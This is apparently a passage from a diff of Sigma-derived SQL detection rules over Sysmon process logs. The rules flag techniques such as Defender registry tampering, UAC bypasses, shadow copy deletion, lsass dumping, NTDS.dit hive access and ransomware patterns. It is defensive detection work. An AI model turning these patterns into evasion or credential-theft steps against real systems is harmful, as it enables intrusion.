Key Tampering Via Reg.EXE", - "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "title": "Regasm/Regsvcs Suspicious Execution", + "id": "cc368ed0-2411-45dc-a222-510ace303cb2", "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.009" ], "falsepositives": [ - "Rare legitimate use by administrators to test software (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR 
CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" ], - "filename": "proc_creation_win_reg_defender_tampering.yml" + "filename": "proc_creation_win_lolbin_regasm.yml" }, { - "title": "Execute MSDT Via Answer File", - "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", - "status": "experimental", - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Privilege Escalation via Weak Service Permissions", + "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "status": "test", + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "author": "Teymur Kheirkhabarov", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR 
CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" + "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" }, { - "title": "Suspicious Hacktool Execution - PE Metadata", - "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "title": "Suspicious WMIC Execution Via Office Process", + "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", + "description": "Office application called wmic to proxye execution through a LOLBIN process. 
This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "author": "Vadim Khrykov, Cyb3rEng", + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Company = 'Cube0x0')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - Process", - "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian 
Burkard (Nextron Systems)", + "title": "Suspicious AgentExecutor PowerShell Execution", + "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "status": "experimental", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" + "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" }, { - "title": "Suspicious Binary In User Directory Spawned From Office Application", - "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "title": "Potential PsExec Remote Execution", + "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", "status": "experimental", - "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, 
Excel, PowerPoint, Publisher, Visio)", - "author": "Jason Lynch", + "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND Image LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" + "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" }, { - "title": "Execution via CL_Invocation.ps1", - "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", - "status": "test", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "File Download Using Notepad++ GUP Utility", + "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "status": "experimental", + "description": "Detects execution of the Notepad++ updater (gup) from a process 
other than Notepad++ to download files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Other parent processes other than notepad++ using GUP that are not currently identified" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cl_invocation.yml" + "filename": "proc_creation_win_gup_download.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Update Activity", - "id": "e7581747-1e44-4d4b-85a6-0db0b4a00f2a", + "title": "Suspicious Windows App Activity", + "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", "status": "experimental", - "description": "Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software", + "description": "Detects suspicious children of application launched from inside the WindowsApps directory. 
This could be a sign of a rogue \".appx\" package installation/execution", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\3CXDesktopApp\\\\app\\\\update.exe' ESCAPE '\\' AND CommandLine LIKE '%--update%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%/electron/update/win32/18.12%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((Image LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_update.yml" + "filename": "proc_creation_win_susp_appx_execution.yml" }, { - "title": "Bypass UAC via WSReset.exe", - "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", + "id": "55f0a3a1-846e-40eb-8273-677371b8d912", "status": "test", - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1059", + "attack.t1202" ], "falsepositives": [ - "Unknown sub processes of Wsreset.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_wsreset.yml" + "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", - "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", - "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "title": "UAC Bypass Using Event Viewer RecentViews", + "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" }, { - "title": "Potential Procdump Evasion", - "id": "79b06761-465f-4f88-9ef2-150e24d3d737", + "title": "WMI Backdoor Exchange Transport Agent", + "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", "status": "test", - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event 
filters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Cases in which procdump just gets copied to a different directory without any renaming" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher", - "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "title": "Suspicious Process Created Via Wmic.EXE", + "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", "status": "test", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron 
Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" + "filename": 
"proc_creation_win_wmic_susp_process_creation.yml" }, { - "title": "Rundll32 UNC Path Execution", - "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", - "status": "experimental", - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DarkSide Ransomware Pattern", + "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "status": "test", + "description": "Detects DarkSide Ransomware and helpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1021.002", - "attack.t1218.011" + "attack.t1204" ], "falsepositives": [ - "Unlikely" + "Unknown", + "UAC bypass method used by other malware" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_unc_path.yml" + "filename": "proc_creation_win_malware_darkside_ransomware.yml" }, { - "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", - "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", - "status": "test", - "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - Crassus Execution", + "id": 
"2c32b543-1058-4808-91c6-5b31b8bed6c5", + "status": "experimental", + "description": "Detects Crassus a windows privilege escalation discovery tool based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" + "attack.discovery", + "attack.t1590.001" ], "falsepositives": [ - "Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. before log collection agent installation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Crassus.exe' ESCAPE '\\' OR OriginalFileName = 'Crassus.exe' OR Description LIKE '%Crassus%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_logman_disable_eventlog.yml" + "filename": "proc_creation_win_pua_crassus.yml" }, { - "title": "Suspicious Mshta.EXE Execution Patterns", - "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", + "title": "Sensitive Registry Access via Volume Shadow Copy", + "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "status": "experimental", - "description": "Detects suspicious mshta process execution patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ 
- "attack.execution", - "attack.t1106" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_susp_pattern.yml" + "filename": "proc_creation_win_malware_conti_shadowcopy.yml" }, { - "title": "Renamed ProcDump 